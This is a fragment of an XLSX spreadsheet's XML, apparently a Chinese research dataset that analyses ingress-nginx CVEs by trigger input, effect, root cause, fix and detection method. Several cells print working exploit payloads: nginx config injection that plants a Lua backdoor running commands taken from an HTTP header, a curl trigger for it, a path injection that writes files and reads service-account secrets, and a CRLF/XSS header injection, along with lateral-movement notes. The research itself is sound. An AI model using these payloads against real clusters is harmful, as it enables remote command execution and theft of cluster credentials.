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15" windowHeight="10260"/>
  </bookViews>
  <sheets>
    <sheet name="第一轮原始分析数据" sheetId="55" r:id="rId1"/>
    <sheet name="第二轮分析数据" sheetId="31" r:id="rId2"/>
    <sheet name="最终确定的CVE漏洞数据" sheetId="6" r:id="rId3"/>
    <sheet name="触发输入和方式相关的统计信息" sheetId="42" r:id="rId4"/>
    <sheet name="触发效果相关的统计信息" sheetId="10" r:id="rId5"/>
    <sheet name="修复方式以及根本原因相关统计" sheetId="21" r:id="rId6"/>
    <sheet name="发现方法相关的统计信息" sheetId="12" r:id="rId7"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="0" hidden="1">第一轮原始分析数据!$1:$68</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="1" hidden="1">第二轮分析数据!$A:$XFC</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="3" hidden="1">触发输入和方式相关的统计信息!$A$1:$AM$48</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="4" hidden="1">触发效果相关的统计信息!$A$1:$U$48</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="5" hidden="1">修复方式以及根本原因相关统计!$A$1:$Z$48</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="6" hidden="1">发现方法相关的统计信息!$A$1:$S$48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bobo</author>
  </authors>
  <commentList>
    <comment ref="A1" authorId="0">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <rFont val="宋体"/>
            <charset val="134"/>
          </rPr>
          <t>bobo:</t>
        </r>
        <r>
          <rPr>
            <sz val="9"/>
            <rFont val="宋体"/>
            <charset val="134"/>
          </rPr>
          <t xml:space="preserve">
标绿的为新的确定为CVE的漏洞</t>
        </r>
      </text>
    </comment>
  </commentList>
</comments>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="8036" uniqueCount="1709">
  <si>
    <t>测试目标</t>
  </si>
  <si>
    <t>备注</t>
  </si>
  <si>
    <t>通过什么技术发现的</t>
  </si>
  <si>
    <t>漏洞简述</t>
  </si>
  <si>
    <t>存在漏洞的版本</t>
  </si>
  <si>
    <t>修复版本以及对应的fix 补丁</t>
  </si>
  <si>
    <t>漏洞链接</t>
  </si>
  <si>
    <t>测试项目以及对应的组件</t>
  </si>
  <si>
    <t>利用前提</t>
  </si>
  <si>
    <t>攻击场景（详细的攻击过程&amp;poc链接）</t>
  </si>
  <si>
    <t>漏洞执行效果（后续根据具体的攻击方式对漏洞进行分类）</t>
  </si>
  <si>
    <t>漏洞效果</t>
  </si>
  <si>
    <t>漏洞效果-子分类</t>
  </si>
  <si>
    <t>权限提升影响范围/ 漏洞影响范围-&gt; 用于构造攻击模型</t>
  </si>
  <si>
    <t>是否为资源注入类漏洞</t>
  </si>
  <si>
    <t>漏洞类别（校验缺失or 绕过）</t>
  </si>
  <si>
    <t>攻击向量分类</t>
  </si>
  <si>
    <t>是否存在多个攻击向量</t>
  </si>
  <si>
    <t>注入方式（解析注入&amp;配置字段注入&amp;资源引用注入）</t>
  </si>
  <si>
    <t>资源字段</t>
  </si>
  <si>
    <t>是否涉及多个字段（如涉及多个字段，分字段进行分析）</t>
  </si>
  <si>
    <t>涉及多字段-&gt; 字段之间的关系</t>
  </si>
  <si>
    <t>字段位置(注解/标签/spec)</t>
  </si>
  <si>
    <t>字段是否具有名称特征</t>
  </si>
  <si>
    <t>字段所属代码类型</t>
  </si>
  <si>
    <t>字段所属代码类型-细分类别</t>
  </si>
  <si>
    <t>所属资源类别</t>
  </si>
  <si>
    <t>资源的功能类别（ 只对内置资源类型进行记录）</t>
  </si>
  <si>
    <t>资源作用域</t>
  </si>
  <si>
    <t>是否可通过资源之间的关系进行推理</t>
  </si>
  <si>
    <t>资源字段关系推理类别( 具体怎么识别-&gt; 子类）</t>
  </si>
  <si>
    <t>字段安全文档化程度</t>
  </si>
  <si>
    <t>字段安全文档化程度-细分类别</t>
  </si>
  <si>
    <t>字段功能</t>
  </si>
  <si>
    <t>字段功能-子类别</t>
  </si>
  <si>
    <t>字段选取的特征类别</t>
  </si>
  <si>
    <t>字段数据流向特征（跨信任域特征）</t>
  </si>
  <si>
    <t>字段处理特征</t>
  </si>
  <si>
    <t>字段数据流向特征-子类</t>
  </si>
  <si>
    <t>关键操作类别（ 分层次类别）</t>
  </si>
  <si>
    <t>关键操作（子类别）</t>
  </si>
  <si>
    <t>关键操作所在的资源协调流程（ 对应的是控制器资源处理的生命周期）</t>
  </si>
  <si>
    <t>函数语义特征（ 主要侧重在是否有标准化的控制器模式）</t>
  </si>
  <si>
    <t>外部交互程度（同一应用跨组件、跨应用）
-&gt; 重点关注关键操作本身是否存在跨组件
（</t>
  </si>
  <si>
    <t>错误处理特征（ 关键操作调用失败后）</t>
  </si>
  <si>
    <t>跨组件传播特征（关键操作本身是否存在跨组件调用的场景）
从控制器的synchandler中关键操作入口出发是否存在跨组件调用函数的场景（ #TODO 数据需要进一步确认）</t>
  </si>
  <si>
    <t>攻击路径传播长度（ 从读资源的位置到sink点位置的函数调用深度）</t>
  </si>
  <si>
    <t>安全检查所在组件（粗略数据）-&gt; 原有数据</t>
  </si>
  <si>
    <t>怎么修复（详细的修复内容）</t>
  </si>
  <si>
    <t>修复位置（ 最终用于统计的数据）</t>
  </si>
  <si>
    <t>修复类型特征</t>
  </si>
  <si>
    <t>修复位置特征（重点分析控制器中check点的位置）</t>
  </si>
  <si>
    <t>验证库使用（ 用于说明sanitizer点的多样化实现)</t>
  </si>
  <si>
    <t>错误处理特征（ 错误信息、错误反馈的机制、错误处理的方式）</t>
  </si>
  <si>
    <t>检测对应的方法类型</t>
  </si>
  <si>
    <t>测试版本</t>
  </si>
  <si>
    <t>所需最低go 版本</t>
  </si>
  <si>
    <t>CVE-2024-7646</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">静态+ 动态
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>触发： 动态</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">A security issue was discovered in ingress-nginx where an actor with permission to create Ingress objects (in the `networking.k8s.io` or `extensions` API group) can bypass annotation validation to inject arbitrary commands and obtain the credentials of the ingress-nginx controller. In the default configuration, that credential has access to all secrets in the cluster.
</t>
  </si>
  <si>
    <t>ingress-nginx controller &lt; v1.11.2
ingress-nginx controller &lt; v1.10.4</t>
  </si>
  <si>
    <t>ingress-nginx controller v1.11.2 - fixed by kubernetes/ingress-nginx#11719 and kubernetes/ingress-nginx#11721
ingress-nginx controller v1.10.4 - fixed by kubernetes/ingress-nginx#11718 and kubernetes/ingress-nginx#11722
https://github.com/kubernetes/ingress-nginx/pull/11719/commits/9a6cf10a64111db38d7280266650a237e0318028
https://github.com/kubernetes/ingress-nginx/pull/11721/commits/2003f8563cf0c093dad83d0cbe83cb2daf29e80b
对于危险级别的annotation 启用高级别的校验
configurationsnilppet: 
c5f348ea2eec5f15ab0d5c5e976b29d6787fd3dc</t>
  </si>
  <si>
    <t>https://github.com/kubernetes/kubernetes/issues/126744</t>
  </si>
  <si>
    <t>ingress-nginx</t>
  </si>
  <si>
    <t>1. Permission to create or update Ingress objects in either the networking.k8s.io or extensions API group.
1. 在 networking.k8s.io 或 extensions API 组中创建或更新 Ingress 对象的权限。
2. Access to at least one namespace where they can create these Ingress objects.
2. 访问至少一个命名空间，他们可以在其中创建这些 Ingress 对象。</t>
  </si>
  <si>
    <t>server-snippet: |
  add_header X-Vuln-Header "Benign\r    # 注入回车符
  HTTP/1.1 200 OK                       # 注入新的 HTTP 响应
  Content-Type: text/html
  &lt;script&gt;alert('XSS');&lt;/script&gt;        # 注入 XSS 代码
Ingress 配置
  -&gt; Nginx 配置生成
  -&gt; add_header 指令处理
  -&gt; \r 
  -&gt; HTTP 响应被分割
  -&gt; 注入的内容成为新响应
Poc: https://www.armosec.io/blog/cve-2024-7646-ingress-nginx-annotation-validation-bypass/ (详细的攻击博客说明）
https://github.com/r0binak/CVE-2024-7646
https://www.armosec.io/blog/cve-2024-7646-ingress-nginx-annotation-validation-bypass/
可能获取Nginx Ingress Controller的凭据。攻击者可以通过该凭据访问集群中的Secrets密钥信息。</t>
  </si>
  <si>
    <t>xss-&gt;代码执行-&gt; 权限提升</t>
  </si>
  <si>
    <t>权限提升</t>
  </si>
  <si>
    <t>垂直提权</t>
  </si>
  <si>
    <t>集群范围</t>
  </si>
  <si>
    <t>是</t>
  </si>
  <si>
    <t>校验绕过</t>
  </si>
  <si>
    <t>直接注入</t>
  </si>
  <si>
    <t>不存在</t>
  </si>
  <si>
    <t>配置字段注入</t>
  </si>
  <si>
    <t xml:space="preserve">ingress.kubernetes.io/server-snippet
（ http 响应拆分攻击）
nginx.ingress.kubernetes.io/auth-tls-verify-client
使用\r 进行注入
</t>
  </si>
  <si>
    <t>或（ 存在多个字段可进行利用，但原因一致，没有限制\r字符的使用）</t>
  </si>
  <si>
    <t>注解
注解采取特定的代码模式进行解析</t>
  </si>
  <si>
    <t>是
代码注入类关键词：snippet</t>
  </si>
  <si>
    <t>go语言内置类型
自定义类型</t>
  </si>
  <si>
    <t xml:space="preserve">
1.  基本类型（string)
ingress.kubernetes.io/server-snippet-&gt;
anns.Ingress.ServerSnippet
对应的赋值位置：
Configuration.[]Server.ServerSnippet
2. 结构体字段
nginx.ingress.kubernetes.io/auth-tls-verify-client
-&gt; 
存在包装 authtls.Config中的字段-&gt;
anns.Ingress.CertificateAuth 
对应赋值的位置：
Configuration.[]Server.CertificateAuth
</t>
  </si>
  <si>
    <t>内置资源</t>
  </si>
  <si>
    <t>服务发现与负载均衡</t>
  </si>
  <si>
    <t>命名空间</t>
  </si>
  <si>
    <t>否</t>
  </si>
  <si>
    <t>指令配置</t>
  </si>
  <si>
    <t>代码注释： 存在代码注释，但缺少安全性说明
文档： 对字段的危险性进行了详细的说明
https://kubernetes.github.io/ingress-nginx/user-guide/nginx-configuration/annotations-risk/
验证逻辑： 存在验证逻辑
错误信息提示: 错误信息中存在管理员禁用相关字段的危险性信息提示
单元测试文件中进行测试：存在禁用测试</t>
  </si>
  <si>
    <t>代码注入： 允许直接往配置中注入可执行代码</t>
  </si>
  <si>
    <t>通过目标配置项反推k8s资源中的危险字段</t>
  </si>
  <si>
    <t>跨信任域： 应用开发-&gt; 集群运维
跨组件：Ingress-controller-&gt; nginx (底层的反向代理）</t>
  </si>
  <si>
    <t>验证后使用</t>
  </si>
  <si>
    <t>直接赋值</t>
  </si>
  <si>
    <t>配置生成</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">生成Nginx配置文件
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>getConfiguration</t>
    </r>
  </si>
  <si>
    <t>资源控制协调过程</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
存在注释说明函数的功能为配置生成
返回值存在明显的配置数据结构
入口点： 满足控制器reconcile 模式
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>关键操作本身不存在与外部交互，关键操作前后存在与外部交互的函数操作</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
  </si>
  <si>
    <t>函数操作失败后有metrics进行错误信息收集
-&gt; 部分操作有
使用klog、 n.recorder.Eventf 特定的接口（以特定的事件类别k8s.IngressPodDetails）</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">生成配置后有明显的分发配置的操作或者重置更新的操作:
err := n.OnUpdate(*pcfg) 和 err := n.configureDynamically(pcfg)
更新k9s.io/ingress-nginx/internal/ingress.Configuration
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
配置分发-&gt; 
http 请求、udp传输
1. 函数调用链中出现 nginx 相关的函数或变量。
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>分发配置的函数操作有明显的与Nginx-server进行交互的函数特征：</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
1. 特定的接口 nginx.NewPostStatusRequest
2. 引用特定的端口
nginx.StreamPort
2. 配置数据的转换和序列化，例如使用 json.Marshal 函数。
3. 使用网络连接（例如 HTTP 或 TCP）将配置数据发送到远程服务器。-?&gt; 收集特定的函数接口
4. 配置数据的格式化，例如使用特定的数据结构或字段来表示配置信息。</t>
    </r>
  </si>
  <si>
    <t>1. ingress.kubernetes.io/server-snippet：
调用深度：2
getConfiguration-&gt;getBackendServers-&gt;createServers
2. nginx.ingress.kubernetes.io/auth-tls-verify-client
调用深度：1
getConfiguration-&gt;getBackendServers</t>
  </si>
  <si>
    <t>controller
admission webhook</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">完善校验规则： 完善正则表达式
authVerifyClientRegex = regexp.MustCompile(`on|off|optional|optional_no_ca`)
 authVerifyClientRegex = </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>regexp.MustCompile(`^(on|off|optional|optional_no_ca)$`)</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>控制器校验：</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
1. getBackendServers
2. createUpstreams
getConfiguration-&gt;getBackendServers-&gt;createUpstreams
3. createServers
getConfiguration-&gt;getBackendServers-&gt;createServers
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>dropSnippetDirectives</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>准入控制器校验：</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">internal\admission\controller\main.go
func (ia *IngressAdmission) </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>HandleAdmission</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">(obj runtime.Object) (runtime.Object, error)-&gt; </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>CheckIngress</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">强化验证逻辑：完善正则表达式
-&gt; 直接在解析注解的功能模块中设定正则表达式
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">
控制器：与赋值点在同一函数中，支配赋值点</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>自定义验证函数：</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
dropSnippetDirectives
CheckIngress
特征：通过识别特定的配置项，定位check点
</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>check 后信息输出：
CheckInrgess: return fmt.Errorf("%s annotation cannot be used. Snippet directives are disabled by the Ingress administrator", key)
  }
dropSnippetDirectives</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>: 内部函数有信息输出</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
  </si>
  <si>
    <t>CVE-2022-4886(对CVE-2021-25745的绕过）</t>
  </si>
  <si>
    <t>校验绕过
1. 攻击者创建/更新 Ingress
   -&gt; 注入特制的 path 值
   -&gt; 绕过路径清理机制
2. ingress-nginx controller 处理
   -&gt; 使用未经充分验证的路径
   -&gt; 导致 controller 凭证泄露
3. 获取 controller 凭证
   -&gt; 利用凭证访问集群 secrets
   -&gt; 获取敏感信息</t>
  </si>
  <si>
    <t>A security issue was discovered in ingress-nginx where a user that can create or update ingress objects can use directives to bypass the sanitization of the `spec.rules[].http.paths[].path` field of an Ingress object (in the `networking.k8s.io` or `extensions` API group) to obtain the credentials of the ingress-nginx controller. In the default configuration, that credential has access to all secrets in the cluster.
Ingress objects contain a field called pathType that defines the proxy behavior. It can be Exact, Prefix and ImplementationSpecific.</t>
  </si>
  <si>
    <t>&lt;v1.8.0</t>
  </si>
  <si>
    <t>v1.8.0
https://github.com/kubernetes/ingress-nginx/commit/c540b584745ac47b45f859c5db52e6b7a612a9c6?diff=unified#diff-f2de6af54e26927e93e6a4e130a517299706ec4b577d3dd96074ab4babadaa51</t>
  </si>
  <si>
    <t>https://github.com/kubernetes/kubernetes/issues/126815</t>
  </si>
  <si>
    <t>POC: https://hackerone.com/reports/1620702
1.攻击者具有创建或更新 Ingress 对象的权限
pathType 设置成ImplementationSpecific
2.目标集群使用 ingress-nginx controller
3. controller 使用默认配置（可访问所有 secrets）</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">log_format exploit escape=none $http_x_ginoah;\n
          server {\n
            server_name x.x;\n
            listen 80;\n
            listen [::]:80;\n
            location /z/ {\n
                access_log /tmp/luashell exploit;\n
            }\n
            location /x/ {\n
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
使用Log_format,access_log还有Include来绕过
.*_by_lua.*</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
path: "/x/ {\n     # 开始注入 nginx 配置
  }\n
  }\n               # 闭合原有配置块
  log_format exploit escape=none $http_x_ginoah;\n  # 定义日志格式，使用header内容
  server {\n        # 注入新的 server 块
    server_name x.x;\n
    listen 80;\n
    listen [::]:80;\n
    location /z/ {\n
      access_log /tmp/luashell exploit;\n  # 将header写入文件
    }\n
    location /x/ {\n
  #"                # 注释掉后续内容
Ingress 的 path 字段被注入 nginx 配置
通过换行和闭合花括号逃逸出原配置块
注入自定义的 log_format 和 server 配置
利用 access_log 将 HTTP header 内容写入任意文件
进一步的横向移动方式：
1.Find another service account with cluster admin permissions
2.Find another service account with node permissions to patch kubelet config；
3.Find another service account with pod permissions to create/patch a privileged pod, then escape to the control-plane node
https://hackerone.com/reports/1620702#activity-17418760（ 有详细的后续横向移动的攻击过程）</t>
    </r>
  </si>
  <si>
    <t>代码执行-&gt; 权限提升</t>
  </si>
  <si>
    <t>spec.rules[].http.paths[].path</t>
  </si>
  <si>
    <t>spec</t>
  </si>
  <si>
    <t>go语言内置类型</t>
  </si>
  <si>
    <t>基本类型（string)</t>
  </si>
  <si>
    <t>路径配置</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">代码注释： 存在代码注释，但缺少安全性说明
文档：无具体文档
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>验证逻辑： 存在验证逻辑</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>错误信息提示:</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">不存在错误信息
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>单元测试文件中进行测试：</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>存在功能性测试</t>
    </r>
  </si>
  <si>
    <t>路径匹配</t>
  </si>
  <si>
    <t xml:space="preserve">
调用深度：1
getConfiguration-&gt;getBackendServers
调用深度2：
getConfiguration-&gt;getBackendServers-&gt;createServers
</t>
  </si>
  <si>
    <t xml:space="preserve">controller
admission </t>
  </si>
  <si>
    <t>完善校验规则</t>
  </si>
  <si>
    <t>准入控制器校验：internal\admission\controller\main.go
func (ia *IngressAdmission) HandleAdmission(obj runtime.Object) (runtime.Object, error)-&gt; CheckIngress</t>
  </si>
  <si>
    <t xml:space="preserve">强化验证逻辑：完善正则表达式
</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>自定义验证函数：</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
CheckIngress
特征：通过识别特定的配置项，定位check点
</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">check 后信息输出：
CheckInrgess: return fmt.Errorf("%s annotation cannot be used. Snippet directives are disabled by the Ingress administrator", key)
  }
</t>
  </si>
  <si>
    <t>resource control</t>
  </si>
  <si>
    <t>CVE-2021-25748(对CVE-2021-25745的绕过）</t>
  </si>
  <si>
    <t>A security issue was discovered in ingress-nginx where a user that can create or update ingress objects can use a newline character to bypass the sanitization of the `spec.rules[].http.paths[].path` field of an Ingress object (in the `networking.k8s.io` or `extensions` API group) to obtain the credentials of the ingress-nginx controller. In the default configuration, that credential has access to all secrets in the cluster.</t>
  </si>
  <si>
    <t>&lt;v1.2.1</t>
  </si>
  <si>
    <t>v1.2.1
https://github.com/kubernetes/ingress-nginx/pull/8623</t>
  </si>
  <si>
    <t>https://github.com/kubernetes/ingress-nginx/issues/8686</t>
  </si>
  <si>
    <t xml:space="preserve">1.alias:
paths:
- path: "/gaf{alias #\n/run/secrets/kubernetes.io/serviceaccount/;}location ~* ^/aaa"
2. root:
x/ {
  root #
  /;
  ...
}
location /y/ {
# # 使用换行符\n 配置格式来绕过\s*root\s*.* 的正则表达式检查，从而允许攻击者可以读取任意文件，漏洞修复为： (?s)\s*root\s*.* qo
bypass the \s*root\s*.*; rule check, which allow attacker to read arbitrary file.
And was fixed in this commit by changing the rule to (?s)\s*root\s*.*;.
By setting the s flag to make the .* match the \n character (#\n/)
</t>
  </si>
  <si>
    <t>权限提升（可提升至集群管理员权限）</t>
  </si>
  <si>
    <t>CVE-2023-5043（对CVE-2021-25742 and CVE-2021-25746 的绕过）</t>
  </si>
  <si>
    <t>动态分析</t>
  </si>
  <si>
    <t>A security issue was identified in ingress-nginx where the nginx.ingress.kubernetes.io/configuration-snippet annotation on an Ingress object (in the networking.k8s.io or extensions API group) can be used to inject arbitrary commands, and obtain the credentials of the ingress-nginx controller. In the default configuration, that credential has access to all secrets in the cluster.</t>
  </si>
  <si>
    <t>&lt;v1.9.0</t>
  </si>
  <si>
    <t>v1.9.0
没有找到对应补丁</t>
  </si>
  <si>
    <t>https://github.com/kubernetes/ingress-nginx/issues/10571</t>
  </si>
  <si>
    <t xml:space="preserve">nginx.ingress.kubernetes.io/configuration-snippet: |
      more_set_headers "suanve"
            proxy_pass http://upstream_balancer;
                                proxy_redirect                          off;
        }
        location /suanve/ { content_by_lua_block { local rsfile = io.popen(ngx.req.get_headers()["cmd"]);local rschar = rsfile:read("*all");ngx.say(rschar); } } location /fs/{
---
# 原始配置
more_set_headers "suanve"
proxy_pass http://upstream_balancer;
proxy_redirect off;
}  # 闭合原块
# 注入的location块
location /suanve/ { 
    content_by_lua_block { 
        local rsfile = io.popen(ngx.req.get_headers()["cmd"]);  # 从header获取命令
        local rschar = rsfile:read("*all");                     # 读取命令输出
        ngx.say(rschar);                                        # 返回结果
    } 
} 
# 注入额外location
location /fs/{
在/suanve/路径下创建了一个使用Lua代码的新location块
这个Lua代码通过io.popen()函数执行来自HTTP header cmd中的命令
执行结果通过ngx.say()返回给请求者
创建了一个隐藏的命令执行后门
攻击者只需发送带有cmd头的请求到/suanve/路径，即可执行任意系统命令
命令结果会直接返回在HTTP响应中
通过以下命令触发： curl -H "cmd: id" https://suanve.susec.me/suanve/
</t>
  </si>
  <si>
    <t>代码执行-&gt; 提权</t>
  </si>
  <si>
    <t>nginx.ingress.kubernetes.io/configuration-snippet 
通过未闭合的花括号(})和新的location块来逃逸出原有的配置上下文</t>
  </si>
  <si>
    <t>注解</t>
  </si>
  <si>
    <t xml:space="preserve"> 基本类型（string)
nginx.ingress.kubernetes.io/configuration-snippet-&gt;
anns.Ingress.ConfigurationSnippet
赋值位置：
Configuration.[]Server.[]Location,ConfigurationSnippet</t>
  </si>
  <si>
    <t>通过目标配置项反推k9s资源中的危险字段</t>
  </si>
  <si>
    <t>存在包装函数：1层</t>
  </si>
  <si>
